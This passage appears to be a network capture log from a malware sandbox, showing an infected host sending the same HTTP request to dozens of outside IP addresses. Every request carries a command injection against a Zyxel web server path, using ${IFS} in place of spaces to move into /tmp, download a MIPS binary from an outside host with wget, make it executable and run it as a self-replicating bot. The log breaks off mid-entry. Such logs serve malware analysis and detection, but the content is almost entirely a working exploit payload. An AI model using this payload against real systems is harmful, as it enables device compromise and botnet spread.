                                                        5581192.168.2.1456252116.19.73.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019531012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5582192.168.2.144391277.141.97.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019560099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5583192.168.2.1442222107.106.52.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019607067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5584192.168.2.1439766184.110.40.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019655943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5585192.168.2.145299848.215.125.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019697905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5586192.168.2.1457624165.181.97.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019737005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5587192.168.2.143576067.178.73.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019772053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5588192.168.2.1437882112.142.155.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019828081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5589192.168.2.1439036213.154.170.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019856930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5590192.168.2.1447734185.240.91.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019911051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5591192.168.2.1437050182.110.133.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019943953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5592192.168.2.1444824136.254.218.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019970894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5593192.168.2.1441880116.53.151.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020013094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5594192.168.2.145267877.232.217.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020044088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5595192.168.2.1436980222.78.251.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020068884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5596192.168.2.1434820169.144.223.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020107985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5597192.168.2.1460538191.132.84.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020154953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5598192.168.2.1448970216.182.247.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020174026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5599192.168.2.1454408114.63.54.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020216942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5600192.168.2.144442444.167.161.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020241976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5601192.168.2.1456438147.15.119.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020298004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5602192.168.2.146006625.251.21.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020333052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5603192.168.2.143637485.58.10.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020384073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5604192.168.2.144660659.179.70.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020416975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5605192.168.2.1445602170.104.100.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020474911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5606192.168.2.1452546190.161.97.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020500898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5607192.168.2.145451225.191.174.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020534039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5608192.168.2.143745047.89.240.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020577908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5609192.168.2.1454838115.236.136.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020622015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5610192.168.2.143344082.63.53.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020680904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5611192.168.2.1434474147.116.2.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020705938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5612192.168.2.1443848142.203.84.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020723104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5613192.168.2.1455250158.212.58.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020755053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5614192.168.2.1456690143.83.249.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020787001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5615192.168.2.143587249.28.182.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020834923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5616192.168.2.1432872146.37.116.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020859957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5617192.168.2.1450370113.90.7.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020903111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5618192.168.2.1451616200.18.117.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020944118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5619192.168.2.143781057.157.211.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.020978928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5620192.168.2.1454254110.139.184.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021025896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5621192.168.2.1458780142.141.246.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021049976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5622192.168.2.1440156124.109.14.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021105051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5623192.168.2.1451892209.162.209.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021128893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5624192.168.2.1443206138.198.240.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021171093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5625192.168.2.1448964132.167.43.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021214008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5626192.168.2.143434048.7.115.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021244049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5627192.168.2.1433498210.114.45.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021282911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5628192.168.2.143636064.55.119.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021307945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5629192.168.2.1447202128.66.3.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021343946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5630192.168.2.144549070.153.80.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021380901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5631192.168.2.1436076203.15.45.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021420956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5632192.168.2.1435922144.4.55.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021446943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5633192.168.2.1460280182.199.246.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021478891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5634192.168.2.1456056184.19.159.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021536112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5635192.168.2.1452936209.235.212.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021589994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5636192.168.2.145245243.180.208.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021610975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5637192.168.2.143810848.29.125.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021663904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5638192.168.2.1440488195.25.82.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021707058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5639192.168.2.1451004213.23.139.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021739960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5640192.168.2.1458108192.245.105.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021748066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5641192.168.2.1454842190.91.213.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021780968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5642192.168.2.1452478140.33.93.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021840096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5643192.168.2.1456018117.234.139.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021879911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5644192.168.2.1450476149.41.124.31443
